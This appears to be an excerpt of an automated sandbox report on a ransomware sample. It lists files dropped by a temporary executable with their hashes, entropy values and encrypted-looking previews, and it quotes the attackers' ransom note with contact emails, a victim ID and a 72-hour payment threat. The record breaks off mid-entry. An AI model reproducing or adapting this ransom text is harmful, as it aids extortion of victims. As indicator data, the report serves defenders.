                                                                                                    Preview:w..1..O.i K....Q+G.K..<.H.......8.,...O.y.v..u.%.9......9...o..y]~.w.[C.5......#b2....N?.NSr.O^RP.q....M.\.}..L..cQ3......\..o..6.lR.I..0>).`.c.`...r....[/....X..... c..o0.d.mT...<.../...r.._;x....+..8.+.*t....w.........(|.@.J....K.^.aV..o....../0......%...'..G...}........O.5....Fl.M...U33rj.[..5?]...`.Y.!K..2..h...%.r..TP...z.0..........{.[.A.Y.......3.....Rj._|lH.u.-.....Q..'.........D#M.'$....?.y.9....T..j?`...U..0...3..T..=>!.],n.....Kg.|.Y0.0.0J..,.I,...~.5.-s....4.N..........3....V.........F...a.U...,.)+K.-Q..h?B0...f......3...[."...-F6.....).U+.....S..Rc...UGb6%5_..S4....-.U..r.....2ViXC../?..X.....w..v.&....c.4?N..1P@-...#*......(..?.&....1.."..6oC. .dR..0$.Q].B.......f..j-...._....4.."F[...Lr@k..c..tc5.&k..?.4L/...n{bu&.......P,...c.?..-..yU%.en....l.!V..L....Y.....R.N..L=.DwIEg.q.G......V#.*.."5.cO.H..'...$..}.h..o.."||...h..iA.......?.m[.jMO..f....mI.....V.....O7e#.}...=T.}...s...8U...;..2.....#$..7v..H.@8...l{......
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.836554459789659
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:F6ZSSX9mYj0MwvBYdoo3KCXpJ+q05I6vhDMF9VFwP1pal/n8jUq4/21qwS+V0ZQ4:FAtm4doevA5IKu9rwP1pahn6621qwSu0
                                                                                                    MD5:D975A58186E3D4A58F3362994E458B5D
                                                                                                    SHA1:AECEEBF1C4112226263210BDE91CA6ECD4A1C47A
                                                                                                    SHA-256:8768AAD472A772C0F6DE1C91521B0A1674C0F63DD49B137570109737CEB43103
                                                                                                    SHA-512:7C9EB74D7DC533C2B5A6E6CB72D13F38F8558C4382F9A14194FE0B55BCE2E4E6462D9D46D1779EEFDBBDFE451C3C76A49EFBDA13C4538FD87091F22503E3981E
                                                                                                    Malicious:false
                                                                                                    Preview:..C..N.HO#.....6w.....5]...w......n..r4F..D.wv.....}"\.5.6.m..r...2.........PN.......N..z..-Q..y.#.T..x......X~..}.&.zH..6.n..*.x.g.......&.3R.!.[.-j....8zm+..7j..[.-.tI.._...V.y...{.#iG(.5.\.Ro.u.............;..O...H..E9..w1.tGc...;5...[[~...C...D...~.s-..u..<....1H...j..3.&.z?.v~9......i?X#.m.F.Q..E.g..~.....k-`&,..VOK[.....7...\[...-Q...(..llf=`zZ2&~8..<5..e......)>O.;M...Z.Zwu..}...)[=o..^..9..U'g....8.P.Q...G...fKd....Q.....w..<..."...:m....#.. .S....1....;.+5k.1...../lL{_.0.Y+..3G.p.WM...C.".........`8.w...!.1..7......ES.S.l.kE..=..s.w.P....O.d........vPK...@..2p.}Z..o[T|...Qu..T~..|...2.~.t......kj..x...8hw...:..|dn*5[...x..8.@.....b)..l.....f..R.'./..z.....Q.A...xP......C0.z'....96.ry......E.kY...`.a3..>........1..M.C...,&.....u..n.4.-...oc>.@.M..e..b..k....s....7l....>.WO`.IeB}=.p.iU/.zq.i.Q..W....X..c....._.@......<-.9...(.}U.>ZI.Tz}.:8.........."..b.t.<....^.a"~Xg..a!F........i...&..\.W.Z.g .....40...}|8K.wM...=..y....Y..t^.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.836554459789659
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:F6ZSSX9mYj0MwvBYdoo3KCXpJ+q05I6vhDMF9VFwP1pal/n8jUq4/21qwS+V0ZQ4:FAtm4doevA5IKu9rwP1pahn6621qwSu0
                                                                                                    MD5:D975A58186E3D4A58F3362994E458B5D
                                                                                                    SHA1:AECEEBF1C4112226263210BDE91CA6ECD4A1C47A
                                                                                                    SHA-256:8768AAD472A772C0F6DE1C91521B0A1674C0F63DD49B137570109737CEB43103
                                                                                                    SHA-512:7C9EB74D7DC533C2B5A6E6CB72D13F38F8558C4382F9A14194FE0B55BCE2E4E6462D9D46D1779EEFDBBDFE451C3C76A49EFBDA13C4538FD87091F22503E3981E
                                                                                                    Malicious:false
                                                                                                    Preview:..C..N.HO#.....6w.....5]...w......n..r4F..D.wv.....}"\.5.6.m..r...2.........PN.......N..z..-Q..y.#.T..x......X~..}.&.zH..6.n..*.x.g.......&.3R.!.[.-j....8zm+..7j..[.-.tI.._...V.y...{.#iG(.5.\.Ro.u.............;..O...H..E9..w1.tGc...;5...[[~...C...D...~.s-..u..<....1H...j..3.&.z?.v~9......i?X#.m.F.Q..E.g..~.....k-`&,..VOK[.....7...\[...-Q...(..llf=`zZ2&~8..<5..e......)>O.;M...Z.Zwu..}...)[=o..^..9..U'g....8.P.Q...G...fKd....Q.....w..<..."...:m....#.. .S....1....;.+5k.1...../lL{_.0.Y+..3G.p.WM...C.".........`8.w...!.1..7......ES.S.l.kE..=..s.w.P....O.d........vPK...@..2p.}Z..o[T|...Qu..T~..|...2.~.t......kj..x...8hw...:..|dn*5[...x..8.@.....b)..l.....f..R.'./..z.....Q.A...xP......C0.z'....96.ry......E.kY...`.a3..>........1..M.C...,&.....u..n.4.-...oc>.@.M..e..b..k....s....7l....>.WO`.IeB}=.p.iU/.zq.i.Q..W....X..c....._.@......<-.9...(.}U.>ZI.Tz}.:8.........."..b.t.<....^.a"~Xg..a!F........i...&..\.W.Z.g .....40...}|8K.wM...=..y....Y..t^.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.847619782244501
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Zt18ClS3vtQWbIUtsY5IypF82BQkHMmke:tFciitb0AMre
                                                                                                    MD5:D907AF7DADABFE259CA5C40825E73222
                                                                                                    SHA1:E3DF363C3199DBBB6097D07FBA505A4FE3C42807
                                                                                                    SHA-256:BD7CE6A810DFF701EB4EBDC527533A1C6EC09ADA0904A3340EC83D9A3E7529B2
                                                                                                    SHA-512:AC1A1B8DC4B83E8A38D27BF83EE449651EF38F2B472D9300D352652A2BB3E504FDCC24C92A1CEDC6F40D93097CAC5306DA1E8099248692C47C9D2DE6B7CAF055
                                                                                                    Malicious:false
                                                                                                    Preview:.(..KMM.=S.rs.8...\./...Kj........A.zU.{Kc..a...<....),.G..~.I.jR#y..,...~"....Z.2.[.xK!....mm!.......'`>r.&6g..h..U..!.....N..Wjiu*b..FM{.......Y2........3...`....De[..h....2..<...=..........H...0..^..93V.D.w...8..r...U.z.($..v....|Af.X.S".{-3.......K..z!'T....3L..e:...U....l.Fk.\m.=NH..X?........A..{!v*y.R..Y......`.. ^.....a.-.GsW.....M.<|..%....0Q..A.......V.....(...`.B....M92I..]]...9..>.:....O.\.Vu..a.:.z.vt;.H..E..T..Lp....F.1.x(.h...7z...\.}V..`...]..*..s~.la...........(.'9....^...m..'...qqz..^.....C..`|...S|..a.vH.5p............. .cf..1T`..'5..'..,.4B.|.......5[.......i.<.Z...fh.t..`.".Ui....gq.....i.>.%..dd..2.H...gi....O..]..(p...).y.$..].(..cr.g*..E....,W.s..S...|0..r....X.{......0K...X..Cb.....w........y.[.2C.;Z...+.P....n......,....{.DD.`..P..@/.C^..a.........q.$G.F.."$....W..._.|.......l$...kk..2E_a...0.bX....R.....|'.GF0..J...Z.ZZn...S[.._....D1..))...........v...zn.1..[L...@'YV|mKPv......%..-_......R.S.N'........F...D...
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.847619782244501
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Zt18ClS3vtQWbIUtsY5IypF82BQkHMmke:tFciitb0AMre
                                                                                                    MD5:D907AF7DADABFE259CA5C40825E73222
                                                                                                    SHA1:E3DF363C3199DBBB6097D07FBA505A4FE3C42807
                                                                                                    SHA-256:BD7CE6A810DFF701EB4EBDC527533A1C6EC09ADA0904A3340EC83D9A3E7529B2
                                                                                                    SHA-512:AC1A1B8DC4B83E8A38D27BF83EE449651EF38F2B472D9300D352652A2BB3E504FDCC24C92A1CEDC6F40D93097CAC5306DA1E8099248692C47C9D2DE6B7CAF055
                                                                                                    Malicious:false
                                                                                                    Preview:.(..KMM.=S.rs.8...\./...Kj........A.zU.{Kc..a...<....),.G..~.I.jR#y..,...~"....Z.2.[.xK!....mm!.......'`>r.&6g..h..U..!.....N..Wjiu*b..FM{.......Y2........3...`....De[..h....2..<...=..........H...0..^..93V.D.w...8..r...U.z.($..v....|Af.X.S".{-3.......K..z!'T....3L..e:...U....l.Fk.\m.=NH..X?........A..{!v*y.R..Y......`.. ^.....a.-.GsW.....M.<|..%....0Q..A.......V.....(...`.B....M92I..]]...9..>.:....O.\.Vu..a.:.z.vt;.H..E..T..Lp....F.1.x(.h...7z...\.}V..`...]..*..s~.la...........(.'9....^...m..'...qqz..^.....C..`|...S|..a.vH.5p............. .cf..1T`..'5..'..,.4B.|.......5[.......i.<.Z...fh.t..`.".Ui....gq.....i.>.%..dd..2.H...gi....O..]..(p...).y.$..].(..cr.g*..E....,W.s..S...|0..r....X.{......0K...X..Cb.....w........y.[.2C.;Z...+.P....n......,....{.DD.`..P..@/.C^..a.........q.$G.F.."$....W..._.|.......l$...kk..2E_a...0.bX....R.....|'.GF0..J...Z.ZZn...S[.._....D1..))...........v...zn.1..[L...@'YV|mKPv......%..-_......R.S.N'........F...D...
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.847623078691154
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:d4dZF9LxdsWdlwRs/J6qGf93cCMehaKwiwFLui0kjqv3sWhurLGc:W9/dLdlwK/Q3sCM6QiwFLj0sc3Zkx
                                                                                                    MD5:A08FAB7406E39D34056EBB55F1E31EDE
                                                                                                    SHA1:54DE6C79423B9E6B678B05D5C25D6A931AB2FDAC
                                                                                                    SHA-256:F1BA3F5DC8B7D3D47E02B3B335757155341A204FAA56C1759CB2B2D7E9621A68
                                                                                                    SHA-512:D2D7B150D7F498847D370F3B0548E8325E5FD774A5DEFB531418320DA6627C16A227C732B43E5A6283441CF9EA8876C524E8B761811BDC5DB41A7EE0805B8B53
                                                                                                    Malicious:false
                                                                                                    Preview:p./..."I.<.4..^..|H..5..r.!....K..N...Gbxm0....3.E.h...^..9.....;4..v..."CR......g...}j.|?...].oP(..5...,.6&0.Bx...&.LE.E..m9nv..O.K.K..z....QGp.\....~.yH.~^..=..4W".sb....=.2.Ti...?...`....L.](.&!.w..Xi..~\.....>h.b.b`.o..V].pY3K..iV..vbq..<<.[....._..7$.`D`4..{h..W....`..-.Gk!S. .....skf@F.......dKltI$0....S..m...@..y.7a..@....O..&.A....\?@zm)^....5`.D...!._...aQ.....=53>.2.~Y..@$.U.s....7...X.Zdrv.......$M..]..=......UD...?.e"....I..S..Wh4...y.r?..AH..!g0o.KL..p..W.....M.!e.N>..T...*.bN...0..O...u.|>.....B..o...q....|.fQ..a..k\...i..R....9.......c......!..~SO..3..\..w.BTX..7E..w..v...Z.s....`.1..H..g>.@..<Vh..........3&...Ks....Z1.z.W..B....G........b......!../...$y.,....{..n.1......O6l..M...&.U.#O|.J......P...1.{....D>..P.5..&..C..q8.Pe....[...xG...Q....W.c....#.i..D<.qh...b......_....K.@(.....VTW....^b..`..\.V.WX/.'....UB.J:........fJ..99....)..J..r@..h....Lw.....'...^f.O %.6.g.....v.3.......FTk...q.e/.i..u.Xj........~6W.v0..}.'.Oy.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.847623078691154
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:d4dZF9LxdsWdlwRs/J6qGf93cCMehaKwiwFLui0kjqv3sWhurLGc:W9/dLdlwK/Q3sCM6QiwFLj0sc3Zkx
                                                                                                    MD5:A08FAB7406E39D34056EBB55F1E31EDE
                                                                                                    SHA1:54DE6C79423B9E6B678B05D5C25D6A931AB2FDAC
                                                                                                    SHA-256:F1BA3F5DC8B7D3D47E02B3B335757155341A204FAA56C1759CB2B2D7E9621A68
                                                                                                    SHA-512:D2D7B150D7F498847D370F3B0548E8325E5FD774A5DEFB531418320DA6627C16A227C732B43E5A6283441CF9EA8876C524E8B761811BDC5DB41A7EE0805B8B53
                                                                                                    Malicious:false
                                                                                                    Preview:p./..."I.<.4..^..|H..5..r.!....K..N...Gbxm0....3.E.h...^..9.....;4..v..."CR......g...}j.|?...].oP(..5...,.6&0.Bx...&.LE.E..m9nv..O.K.K..z....QGp.\....~.yH.~^..=..4W".sb....=.2.Ti...?...`....L.](.&!.w..Xi..~\.....>h.b.b`.o..V].pY3K..iV..vbq..<<.[....._..7$.`D`4..{h..W....`..-.Gk!S. .....skf@F.......dKltI$0....S..m...@..y.7a..@....O..&.A....\?@zm)^....5`.D...!._...aQ.....=53>.2.~Y..@$.U.s....7...X.Zdrv.......$M..]..=......UD...?.e"....I..S..Wh4...y.r?..AH..!g0o.KL..p..W.....M.!e.N>..T...*.bN...0..O...u.|>.....B..o...q....|.fQ..a..k\...i..R....9.......c......!..~SO..3..\..w.BTX..7E..w..v...Z.s....`.1..H..g>.@..<Vh..........3&...Ks....Z1.z.W..B....G........b......!../...$y.,....{..n.1......O6l..M...&.U.#O|.J......P...1.{....D>..P.5..&..C..q8.Pe....[...xG...Q....W.c....#.i..D<.qh...b......_....K.@(.....VTW....^b..`..\.V.WX/.'....UB.J:........fJ..99....)..J..r@..h....Lw.....'...^f.O %.6.g.....v.3.......FTk...q.e/.i..u.Xj........~6W.v0..}.'.Oy.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:OpenPGP Secret Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.836133192628313
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:xcu4/zT324c9rsek1y3hmROgFvsO2/lrZzOTz1o0kLf+Pzhhu6/tHJJl2uo0ulT:xcuwXv4rjK0AvwN9z4R6f+LXu4JJlFot
                                                                                                    MD5:EA21BEE0E3A2C5275C38322D82C5B0D4
                                                                                                    SHA1:8AD6F410034B7D29FCAA0EC1F00C3DF09573B570
                                                                                                    SHA-256:7573EFDFD176D9CBB5AC66571AE3B75477142B845A8E0D92B4306802764CEE2F
                                                                                                    SHA-512:6098C3E44FDD4B8349C9AA2370B735B3C8DC897F2B4193E7E06D3FA595A8F32589A7D15261611469F3A66D711ABA2C4D451DC5D133D60B695434AC6185DC3118
                                                                                                    Malicious:false
                                                                                                    Preview:.k".....R...%7!.J..v.G..T..L......'...L...xk.~.jj.d..V.nJ..lRd.XW>;..@.4cO".IZ....S.u.1.....l..lP............}.P.......cO&..&....F..Tv'..G......+...A.. .!.3-...h.....6....;..{PF....2.B|.L..`wBt]f.......HYo...Xc.k...4&5C.+l.-.B.0K...+u.:.xU..2.i..w]1..d^.L......+.f.LI..E.\...U..l..*..,c..R..C.G^..Bh.P..r&],W~.<.Pa.2.!s..T.J.yQK...= .='.w.<.".9.I.....L9.|0cU.....FA......:XN...M?.......T......w.. .1.....&.JG....a.r...Kr.s..............O&.......S.s....m...4...m....r......t...T.....Tk$....}...L....i;........\...}..I<%.7L.8.k.....>.Ay...5m.....J7.u...f.....R.p".#.4,.-.x..q].J..r....!.V...............5..j..Zo..6....!j .....&........DL.......z9(#.cc........bn../..S.......I$.@......J...fRI#...v.......N..t.e..9.7..G.Q.m.-......K..X...9.Ec....m........o.....uU....>(.........o.(/.sSo...n./.,j9@...6.s.*...`b......M...+...c..V{.mC Vs.."...<.g.".~H.9<h.!......%s.aKV.^vs!@c2^.....t...g.......P.d'.h....A.....6.t...2..0}#r.v.j.i=x..C..4......I....
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:OpenPGP Secret Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.836133192628313
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:xcu4/zT324c9rsek1y3hmROgFvsO2/lrZzOTz1o0kLf+Pzhhu6/tHJJl2uo0ulT:xcuwXv4rjK0AvwN9z4R6f+LXu4JJlFot
                                                                                                    MD5:EA21BEE0E3A2C5275C38322D82C5B0D4
                                                                                                    SHA1:8AD6F410034B7D29FCAA0EC1F00C3DF09573B570
                                                                                                    SHA-256:7573EFDFD176D9CBB5AC66571AE3B75477142B845A8E0D92B4306802764CEE2F
                                                                                                    SHA-512:6098C3E44FDD4B8349C9AA2370B735B3C8DC897F2B4193E7E06D3FA595A8F32589A7D15261611469F3A66D711ABA2C4D451DC5D133D60B695434AC6185DC3118
                                                                                                    Malicious:false
                                                                                                    Preview:.k".....R...%7!.J..v.G..T..L......'...L...xk.~.jj.d..V.nJ..lRd.XW>;..@.4cO".IZ....S.u.1.....l..lP............}.P.......cO&..&....F..Tv'..G......+...A.. .!.3-...h.....6....;..{PF....2.B|.L..`wBt]f.......HYo...Xc.k...4&5C.+l.-.B.0K...+u.:.xU..2.i..w]1..d^.L......+.f.LI..E.\...U..l..*..,c..R..C.G^..Bh.P..r&],W~.<.Pa.2.!s..T.J.yQK...= .='.w.<.".9.I.....L9.|0cU.....FA......:XN...M?.......T......w.. .1.....&.JG....a.r...Kr.s..............O&.......S.s....m...4...m....r......t...T.....Tk$....}...L....i;........\...}..I<%.7L.8.k.....>.Ay...5m.....J7.u...f.....R.p".#.4,.-.x..q].J..r....!.V...............5..j..Zo..6....!j .....&........DL.......z9(#.cc........bn../..S.......I$.@......J...fRI#...v.......N..t.e..9.7..G.Q.m.-......K..X...9.Ec....m........o.....uU....>(.........o.(/.sSo...n./.,j9@...6.s.*...`b......M...+...c..V{.mC Vs.."...<.g.".~H.9<h.!......%s.aKV.^vs!@c2^.....t...g.......P.d'.h....A.....6.t...2..0}#r.v.j.i=x..C..4......I....
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.847882880722477
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:kkF2FNZROlQI4CgN4Jan2pvJ2gVJ1hMidLsbLa4HZB9qVVMCcpITt2S:o3ZR0QbsP2gVrRs/59mom2S
                                                                                                    MD5:18B13C44B35F1FEC11F3BA220F83D7EE
                                                                                                    SHA1:57B3E20700DFAB3038D68F8C61B9C88BE412626E
                                                                                                    SHA-256:7EEB315374830F65A81A836158970A059D96692C9552D4A83A88888655F6F5D8
                                                                                                    SHA-512:F0EC55D11A419957FB1F2298FAE430C9C04CD258BF49A259EC100997D3C79FFB9911DEE6F3CDAF0711C30EC5532E6E5FA574F51D31664484BD04B5DEF8289BBD
                                                                                                    Malicious:false
                                                                                                    Preview:.!......`..J.T..............4.A...E....D.T..v.N...#;.~.x.V[yj.*{.r.F1}s].a49.b9>H#...1Ix@.1.RLa`>.?:..@....*..`.5..C\&1........g.M+`l. .~..C...^1k"H.=G...c.'T.C%.IU#F..'...N..A..o..... ......:$....[...!~.L..%?.....T.Z_.....O'..6.^.m...[...@Ly...y. <.... ,.5.j.....dK{..H/.%]..R.E.4.........*G...V..n3^..x....t....PU...d......bh...T......."..[..l.a....U..x.vd.O..F..JH.......*.........sp.....g:..~..c.......$......_.L..FM...#J.hXQ........ .&.B^......v*.c....1.{:..(V..;....x.k.....@{*.;..G....3_...&w..3..t..\....3.LN....i..u..k.g..Q...m..0?K..5.........!R..q...W.2...).L....#..`.:..KN...W....F..*c..e......b.S.Q.7...l....E...(..m.H.i.u*...>_13.h..!.1.).K....v.X.1..._K.....!2......qG.ey......-..c..w+..=".r-..~.r...KA3Wh..'...PN.\..:... .V.....*.n:x...!.*..Z.../.l.......oF.k.jA.W......@)..(zjz.]......M...x...@C.+..~..T.wm.n,.....;...o...!q.....:f..$.V..A../...Y.-yl..!p..0.S..3K.uYx..+P.?.e....X..i.3...M.Tp.vc..1X..~,...Zu........|.....;._K.':.d....
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.847882880722477
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:kkF2FNZROlQI4CgN4Jan2pvJ2gVJ1hMidLsbLa4HZB9qVVMCcpITt2S:o3ZR0QbsP2gVrRs/59mom2S
                                                                                                    MD5:18B13C44B35F1FEC11F3BA220F83D7EE
                                                                                                    SHA1:57B3E20700DFAB3038D68F8C61B9C88BE412626E
                                                                                                    SHA-256:7EEB315374830F65A81A836158970A059D96692C9552D4A83A88888655F6F5D8
                                                                                                    SHA-512:F0EC55D11A419957FB1F2298FAE430C9C04CD258BF49A259EC100997D3C79FFB9911DEE6F3CDAF0711C30EC5532E6E5FA574F51D31664484BD04B5DEF8289BBD
                                                                                                    Malicious:false
                                                                                                    Preview:.!......`..J.T..............4.A...E....D.T..v.N...#;.~.x.V[yj.*{.r.F1}s].a49.b9>H#...1Ix@.1.RLa`>.?:..@....*..`.5..C\&1........g.M+`l. .~..C...^1k"H.=G...c.'T.C%.IU#F..'...N..A..o..... ......:$....[...!~.L..%?.....T.Z_.....O'..6.^.m...[...@Ly...y. <.... ,.5.j.....dK{..H/.%]..R.E.4.........*G...V..n3^..x....t....PU...d......bh...T......."..[..l.a....U..x.vd.O..F..JH.......*.........sp.....g:..~..c.......$......_.L..FM...#J.hXQ........ .&.B^......v*.c....1.{:..(V..;....x.k.....@{*.;..G....3_...&w..3..t..\....3.LN....i..u..k.g..Q...m..0?K..5.........!R..q...W.2...).L....#..`.:..KN...W....F..*c..e......b.S.Q.7...l....E...(..m.H.i.u*...>_13.h..!.1.).K....v.X.1..._K.....!2......qG.ey......-..c..w+..=".r-..~.r...KA3Wh..'...PN.\..:... .V.....*.n:x...!.*..Z.../.l.......oF.k.jA.W......@)..(zjz.]......M...x...@C.+..~..T.wm.n,.....;...o...!q.....:f..$.V..A../...Y.-yl..!p..0.S..3K.uYx..+P.?.e....X..i.3...M.Tp.vc..1X..~,...Zu........|.....;._K.':.d....
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.84657120132854
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:NhC84TjOkDHn0gcBLvvBtctD9xeoNQnmgVM+lqxj+1vipkC:O9jhH0ZvvBmtD9kIJUM+M+1vI
                                                                                                    MD5:84D70AFA41C4889BD387F44BE0C8423F
                                                                                                    SHA1:966697D8518D2AED7BF6000184FEFAF27BB2B356
                                                                                                    SHA-256:3617D53533AC1B54A359B7F085509F1D7B56B7B61B8C90DDEE26C4706D23D456
                                                                                                    SHA-512:E485BB1A969A2CBF2F747B4A7F67CC5696A2E9DBA52E914B3E9649AD351F10F1EB5CC0F25416A5E635DBE0907715E5A2F8F679B962D7F593EEB6D735292E45E0
                                                                                                    Malicious:false
                                                                                                    Preview:..?..O.qL...Te`..o)...B....L.=-.6:\..........}.....l..~^..@.v...].(.:..f.aC>..+/.1.J}.@...4.;...H/-........Maw&.....P.$0ocn.a.~.H...\(.11..d......\.CR.n'.......K,..z..5n....\..^.b...a..~;C.+.W..~.S6M.L....*.ui.......y(..1y......d...x)i....z+.ZPf.....:g.I.<..5..K...`....=..N.'J*.....n.`..8.....~u.0e..s."..'(u..e..>........@.[.N.u..U^.9.....A?..".h2..-....u.............._R.<.4.=..TUR..E6..V.Z=Zh..f......H.^..ml..s{..8..F(...9.......-..:.,G....v.*.\....Yt...qM.]b...G".....NJ4.m?......9>..pwMP.../`....AVN%..w..\<.[..r.4.E..1.....pl.v.y.............[.u..e.3...x..[.......#.. ..d.N.PsK....|.K...1..w.n7..(.....b.;..%N.m..'..O.?...a..~.P. _...U...G.Oq...a..4b2....T.....TK..7D..?.....L....\...3y...V2..V."...FJ.N..>..R.1..........&..+....p5..w{...z.-.u...J...*......~..=<K.Ko.IY..X.H.e...qI....]W..U.E.<B.....#.h..... ...Bv.x..t.....AH........g!.1..E!.\...J%..8...+........V..O..4."..c.....X#...=*....g6....*...!.J....C&.s{..1Y...&j..u./"......"!x..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.84657120132854
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:NhC84TjOkDHn0gcBLvvBtctD9xeoNQnmgVM+lqxj+1vipkC:O9jhH0ZvvBmtD9kIJUM+M+1vI
                                                                                                    MD5:84D70AFA41C4889BD387F44BE0C8423F
                                                                                                    SHA1:966697D8518D2AED7BF6000184FEFAF27BB2B356
                                                                                                    SHA-256:3617D53533AC1B54A359B7F085509F1D7B56B7B61B8C90DDEE26C4706D23D456
                                                                                                    SHA-512:E485BB1A969A2CBF2F747B4A7F67CC5696A2E9DBA52E914B3E9649AD351F10F1EB5CC0F25416A5E635DBE0907715E5A2F8F679B962D7F593EEB6D735292E45E0
                                                                                                    Malicious:false
                                                                                                    Preview:..?..O.qL...Te`..o)...B....L.=-.6:\..........}.....l..~^..@.v...].(.:..f.aC>..+/.1.J}.@...4.;...H/-........Maw&.....P.$0ocn.a.~.H...\(.11..d......\.CR.n'.......K,..z..5n....\..^.b...a..~;C.+.W..~.S6M.L....*.ui.......y(..1y......d...x)i....z+.ZPf.....:g.I.<..5..K...`....=..N.'J*.....n.`..8.....~u.0e..s."..'(u..e..>........@.[.N.u..U^.9.....A?..".h2..-....u.............._R.<.4.=..TUR..E6..V.Z=Zh..f......H.^..ml..s{..8..F(...9.......-..:.,G....v.*.\....Yt...qM.]b...G".....NJ4.m?......9>..pwMP.../`....AVN%..w..\<.[..r.4.E..1.....pl.v.y.............[.u..e.3...x..[.......#.. ..d.N.PsK....|.K...1..w.n7..(.....b.;..%N.m..'..O.?...a..~.P. _...U...G.Oq...a..4b2....T.....TK..7D..?.....L....\...3y...V2..V."...FJ.N..>..R.1..........&..+....p5..w{...z.-.u...J...*......~..=<K.Ko.IY..X.H.e...qI....]W..U.E.<B.....#.h..... ...Bv.x..t.....AH........g!.1..E!.\...J%..8...+........V..O..4."..c.....X#...=*....g6....*...!.J....C&.s{..1Y...&j..u./"......"!x..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.85214207801734
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:jdVxVa/B02LnM9IVFxa/nGJdWjOdsjfKG+kYwfPOz6FoJqMlDR:jdFaZPLM9IVHbgOsKXwn+6F85DR
                                                                                                    MD5:411DE98D599694384EF6AFD441E5AD02
                                                                                                    SHA1:8A2351F9BE2734E0D9F40392A324BDC40FA5BC69
                                                                                                    SHA-256:DF9F98CA9AAA66E5766FD23441FD90A91B0499316920286FE4C66989970C4BF6
